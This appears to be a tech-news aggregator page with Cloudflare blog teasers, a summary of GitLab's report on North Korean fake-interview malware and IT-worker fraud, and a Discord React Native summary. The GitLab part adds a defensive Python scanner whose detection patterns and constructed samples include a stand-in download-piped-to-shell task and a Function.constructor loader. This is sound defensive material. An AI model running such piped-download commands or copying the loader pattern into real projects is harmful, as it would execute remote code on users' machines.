* Dynamic, identity-aware, and secure Sandbox auth (2026-04-13, Mike Nomitch, Gabi Villalonga Simón): As AI Large Language Models and harnesses like OpenCode and Claude Code become increasingly capable, we see more users kicking off sandboxed agents in response to chat messages, Kanban…
* Cloudflare Client-Side Security: smarter detection, now open to everyone (2026-03-30, Zhiyuan Zheng, Juan Miguel Cejuela): Client-side skimming attacks have a boring superpower: they can steal data without breaking anything. The page still loads. Checkout still completes. All it need…
* How we use Abstract Syntax Trees (ASTs) to turn Workflows code into visual diagrams (2026-03-27, André Venceslau, Mia Malden): Cloudflare Workflows is a durable execution engine that lets you chain steps, retry on failure, and persist state across long-running processes. Developers u…
* Sandboxing AI agents, 100x faster (2026-03-24, Kenton Varda, Sunil Pai, Ketan Gupta): Last September we introduced Code Mode, the idea that agents should perform tasks not by making tool calls, but instead by writing code that calls APIs. We've shown that simply converting an MCP serv…
* We deserve a better streams API for JavaScript (2026-02-27, James M Snell): Handling data in streams is fundamental to how we build applications. To make streaming work everywhere, the WHATWG Streams Standard (informally known as "Web streams") was designed to establish a common API…
* Code Mode: give agents an entire API in 1,000 tokens (2026-02-20, Matt Carey): Model Context Protocol (MCP) has become the standard way for AI agents to use external tools. But there is a tension at its core: agents need many tools to do useful work, yet every tool added fills the m…
* Congratulations to the recipients of the 2025 Spotify FOSS Fund: TL;DR Established in 2022 as a way to help support the great open source ecosystem projects that Spotify relies on and that our developers love, the Spotify FOSS Fund provides monetary support to projects that under…
The GitLab Threat Intelligence Team has detailed its efforts to disrupt North Korean (DPRK) cyber campaigns, specifically focusing on "Contagious Interview" malware distribution and fraudulent IT worker schemes. By analyzing internal platform data, GitLab identified that these state-sponsored actors leverage legitimate tools and fake recruitment scenarios to compromise software developers and generate illicit revenue for the regime. The report concludes that while these operations are sophisticated and persistent, proactive monitoring and cross-industry intelligence sharing are essential to mitigating these evolving threats.
### Contagious Interview Mechanics
* Threat actors pose as recruiters to trick software developers into executing malicious JavaScript projects under the guise of technical interviews.
* The primary goal is to deploy malware families such as BeaverTail and Ottercookie, which facilitate credential theft and provide remote control of the victim's device.
* A notable evolution in tradecraft includes the use of "ClickFix," a compiled BeaverTail variant identified in late 2025.
* Malicious repositories often use a specific execution pattern where base64-encoded URLs and secret headers are hidden within `.env` files, masquerading as benign configuration variables.
* To execute the payload, actors utilize `Function.constructor` to load strings as executable code, often triggered by custom error handlers designed to source remote content.
### 2025 Campaign Trends and Infrastructure
* GitLab banned 131 unique accounts linked to these campaigns in 2025, with activity peaking in September and averaging 11 bans per month.
* Nearly 90% of malicious accounts were created using Gmail addresses, and actors typically accessed the platform through consumer VPNs or dedicated VPS infrastructure.
* In more than 80% of cases, malware payloads were not stored on GitLab. Instead, actors used concealed loaders to fetch content from legitimate hosting services, most commonly Vercel.
* Recent tactics include creating malicious NPM dependencies immediately before they are needed and abusing VS Code tasks to pipe remote content into native shells.
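The loader traits summarized above (base64-encoded URLs in `.env` values, `Function.constructor` turning strings into code, and VS Code tasks that pipe downloads into a shell) can be checked for before anyone runs a recruiter-supplied project. The following scanner is an added example, not GitLab's tooling or part of the report; all sample inputs are constructed and use the reserved `.invalid` TLD.

```python
"""Added example, not GitLab's tooling: flag the loader traits the report describes in a
cloned "interview" project: .env values that base64-decode to URLs, Function.constructor
turning strings into code, and VS Code tasks piping downloads into a shell."""
import base64, json, re
from urllib.parse import urlparse

URL_SCHEME = re.compile(r"^https?://", re.I)
CODE_EVAL = re.compile(r"Function\s*\.\s*constructor|\bnew\s+Function\s*\(|\beval\s*\(")
REMOTE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sh|bash|zsh|node)\b")

def decode_b64(value):
    """Decode value if it is well-formed base64 text, else return None."""
    v = value.strip().strip("\"'")
    if len(v) < 16 or not re.fullmatch(r"[A-Za-z0-9+/=]+", v):
        return None
    try:
        return base64.b64decode(v, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None

def suspicious_env_entries(env_text):
    """Return (key, host) for .env values whose base64 decoding is a URL."""
    hits = []
    for line in env_text.splitlines():
        key, sep, value = line.strip().partition("=")
        if not sep or key.startswith("#"):
            continue
        decoded = decode_b64(value)
        if decoded and URL_SCHEME.match(decoded):
            hits.append((key.strip(), urlparse(decoded).netloc))
    return hits

def dynamic_code_lines(js_text):
    """Return 1-based line numbers holding string-to-code constructs."""
    return [n for n, l in enumerate(js_text.splitlines(), 1) if CODE_EVAL.search(l)]

def suspicious_tasks(tasks_json):
    """Return labels of VS Code tasks whose command pipes a download into a shell."""
    tasks = json.loads(tasks_json).get("tasks", [])
    return [t.get("label", "?") for t in tasks
            if REMOTE_TO_SHELL.search(" ".join([t.get("command", "")] + t.get("args", [])))]

# Constructed samples; hosts use the reserved .invalid TLD.
SAMPLE_ENV = "DB_HOST=localhost\nAPI_KEY=%s\nJWT_SECRET=changeme-in-production" % (
    base64.b64encode(b"https://loader.example.invalid/api/ipc").decode())
SAMPLE_JS = "process.on('uncaughtException', () => {\n  Function.constructor(body)();\n});"
SAMPLE_TASKS = json.dumps({"tasks": [
    {"label": "build", "command": "npm", "args": ["run", "build"]},
    {"label": "setup", "command": "curl -s https://cdn.example.invalid/s | sh"}]})
```

Run the three functions over a project's `.env`, its JavaScript sources and `.vscode/tasks.json`; a hit in any of them is reason to review the repository offline rather than execute it.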
### IT Worker Campaigns and Sanctions Evasion
* Beyond malware distribution, DPRK actors use GitLab to support "IT worker" cells that generate revenue and evade international sanctions.
* One identified pipeline involved the creation of at least 135 synthetic identities, automated to generate professional connections and contact leads at scale.
* Threat actors have been observed adding their own images to stolen U.S. identity documents to bypass employment verification processes.
* Forensic analysis revealed financial records from cell managers detailing revenue proceeds from 2022 through 2025, often earned while operating from locations like Moscow, Russia.
Organizations should remain vigilant against recruitment-themed social engineering and scrutinize unexpected requests to run external code. GitLab recommends that the security community use the provided indicators of compromise to update defensive posture, as these actors continue to refine their ability to hide malicious intent within legitimate development workflows.
Discord leverages React and React Native to maintain high development velocity across desktop and mobile platforms while navigating the performance constraints of cross-platform frameworks. After initially avoiding React Native for Android due to hardware limitations, the company transitioned its client in 2022 by utilizing the Hermes JavaScript engine and targeting improved device capabilities. This strategic shift has allowed for significant efficiency gains, including a 50% reduction in median startup times as the team shifts focus toward optimizing experiences for power users.
### Cross-Platform Development and Android Transition
* Discord uses React for desktop and React Native for mobile to allow unified feature shipping across platforms.
* The company originally delayed adopting React Native on Android to avoid performance degradation on a wide range of hardware.
* The formal transition to React Native for Android occurred in 2022, spurred by the introduction of Hermes, a JavaScript engine optimized for React Native.
### Performance Optimization and Efficiency
* React Native introduced specific trade-offs, particularly regarding startup times on lower-end Android devices.
* Discord’s engineering team successfully halved median startup times throughout 2023 through focused architectural improvements.
* Current development efforts are prioritizing performance for "power users" who push the app's limits, ensuring stability and speed for high-intensity use cases.
Discord’s journey highlights that while cross-platform frameworks like React Native require rigorous optimization—especially on Android—the trade-off for development speed and feature parity is increasingly viable through modern tools like the Hermes engine.